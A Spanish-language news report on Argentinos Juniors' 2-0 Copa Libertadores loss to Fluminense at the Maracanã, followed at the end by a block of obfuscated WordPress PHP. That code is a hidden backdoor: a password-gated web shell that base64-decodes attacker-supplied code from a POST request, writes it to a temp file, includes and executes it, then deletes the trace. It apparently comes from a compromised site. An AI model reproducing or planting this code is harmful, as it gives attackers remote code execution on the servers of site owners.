Argentinos Juniors jugó un muy buen partido, pero sobre la hora Fluminense lo liquidó

Argentinos Juniors perdió con Fluminense 2-0, en el estadio Maracaná, en el partido de vuelta de los octavos de final de la Copa Libertadores y así se despidió del torneo. Los goles locales llegaron en los minutos finales. En la ida, la semana pasada en La Paternal habían empatado 1-1.

El equipo de Gabriel Milito jugó un muy buen partido y por momentos controló las acciones y le causó preocupación al poderoso conjunto local. Con distribución acertada, transiciones rápidas en el mediocampo y hasta con algunas chances claras -como una tapada de Fabio ante un remate de Santiago Montiel y un disparo bajo de Luciano Gondou que salió muy cerca, en el primer tiempo-, Argentinos Juniors estuvo cerca de dar las sorpresas.

En el minuto 41 del segundo tiempo, una mala resolución defensiva del Bicho le permitió a John Kennedy darle el pase corto a Samuel Xavier que sacó un derechazo que el arquero debutante Miguel Acosta (Alexis Martín Arias había sido expulsado en la ida y Federico Lanzillota se lesionó en el precalentamiento- tocó pero no pudo sacar.

En el festejo hubo una fuerte discusión y empujones en los bancos y Milito fue expulsado. En los instantes finales, Argentinos tomó una postura más ofensiva y en ese matar o morir dejó espacios libres. Y lo aprovechó el juvenil John Kennedy para arrancar en una larga carrera desde mitad de cancha, llegar al área, enganchar ante Marco Di Césare y sacar el disparo bajo que pegó en la base del palo y entró, en el séptimo minuto adicionado.

Dos minutos después fue expulsado Santiago Montiel.

En cuartos de final, Fluminense enfrentará al ganador de Olimpia-Flamengo. En la ida se impuso el equipo brasileño, clásico del Flu, 1 a 0 y este jueves jugarán la vuelta en Asunción.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}